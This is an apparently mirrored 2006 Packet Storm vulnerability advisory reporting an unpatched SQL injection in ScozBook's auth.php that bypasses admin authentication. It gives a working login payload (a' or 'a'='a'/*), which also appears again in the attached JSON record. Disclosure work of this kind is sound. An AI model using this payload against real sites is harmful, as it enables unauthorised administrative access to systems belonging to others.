Search...

EV0011.txt

2006-01-04T00:00:00

ID PACKETSTORM:42774
Type packetstorm
Reporter Aliaksandr Hartsuyeu
Modified 2006-01-04T00:00:00

Description

                                        
                                            `New eVuln Advisory:  
ScozBook "adminname" Authentication Bypass  
  
--------------------Summary----------------  
Vendor: ScozNet  
Vendor's Web Site: http://www.scoznet.com/  
Software: ScozBook  
Sowtware's Web Site: http://sourceforge.net/projects/scozbook/  
Versions: BETA 1.1  
Critical Level: Moderate  
Type: SQL Injection  
Class: Remote  
Status: Unpatched  
Exploit: Available  
Solution: Not Available  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
Published: 2006.01.02  
eVuln ID: EV0011  
  
-----------------Description--------------  
Vulnerable scripts:  
auth.php  
  
Variable $adminname isn't properly sanitized before being used in a SQL query.  
  
Script /auth.php from main directory registers session with $adminname and $adminpass variables which used by scripts from /admin/ dirrectory.  
  
Condition: magic_quotes_gpc = off  
  
--------------Exploit---------------------  
Link:  
http://host/auth.php  
  
username: a' or 'a'='a'/*  
password: anypassword  
  
  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit---------------------  
Original Advisory:  
http://evuln.com/vulns/11/summary.html  
  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
  
`

JSON Vulners Source

Initial Source

{"hash": "353742cd6a7cd4a6ae9932aa1c4f49bf248f234bf8699d8b6b7edf4645532549", "edition": 1, "references": [], "objectVersion": "1.2", "viewCount": 0, "type": "packetstorm", "description": "", "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/42774/EV0011.txt.html", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "341065d65eb7cbb684743c55b9bc1f10"}, {"key": "modified", "hash": "43c828ba150c67f55194de75f4c4b0e5"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "43c828ba150c67f55194de75f4c4b0e5"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "01afaacf0e226375cfd7df98ada9fc99"}, {"key": "sourceData", "hash": "8c0f481b67e9363398525ed3f24a8d07"}, {"key": "sourceHref", "hash": "452cc3f2a559972ad9f56e22c42c0566"}, {"key": "title", "hash": "2b6a5852d07ebdaec2adec712d728d33"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "published": "2006-01-04T00:00:00", "modified": "2006-01-04T00:00:00", "title": "EV0011.txt", "cvelist": [], "sourceHref": "https://packetstormsecurity.com/files/download/42774/EV0011.txt", "history": [], "reporter": "Aliaksandr Hartsuyeu", "lastseen": "2016-11-03T10:27:00", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:27:00"}, "dependencies": {"references": [], "modified": "2016-11-03T10:27:00"}, "vulnersScore": -0.4}, "sourceData": "`New eVuln Advisory: \nScozBook \"adminname\" Authentication Bypass \n \n--------------------Summary---------------- \nVendor: ScozNet \nVendor's Web Site: http://www.scoznet.com/ \nSoftware: ScozBook \nSowtware's Web Site: http://sourceforge.net/projects/scozbook/ \nVersions: BETA 1.1 \nCritical Level: Moderate \nType: SQL Injection \nClass: Remote \nStatus: Unpatched \nExploit: Available \nSolution: Not Available \nDiscovered by: Aliaksandr Hartsuyeu (alex@evuln.com) \nPublished: 2006.01.02 \neVuln ID: EV0011 \n \n-----------------Description-------------- \nVulnerable scripts: \nauth.php \n \nVariable $adminname isn't properly sanitized before being used in a SQL query. \n \nScript /auth.php from main directory registers session with $adminname and $adminpass variables which used by scripts from /admin/ dirrectory. \n \nCondition: magic_quotes_gpc = off \n \n--------------Exploit--------------------- \nLink: \nhttp://host/auth.php \n \nusername: a' or 'a'='a'/* \npassword: anypassword \n \n \n--------------Solution--------------------- \nNo Patch available. \n \n--------------Credit--------------------- \nOriginal Advisory: \nhttp://evuln.com/vulns/11/summary.html \n \nDiscovered by: Aliaksandr Hartsuyeu (alex@evuln.com) \n \n`\n", "id": "PACKETSTORM:42774"}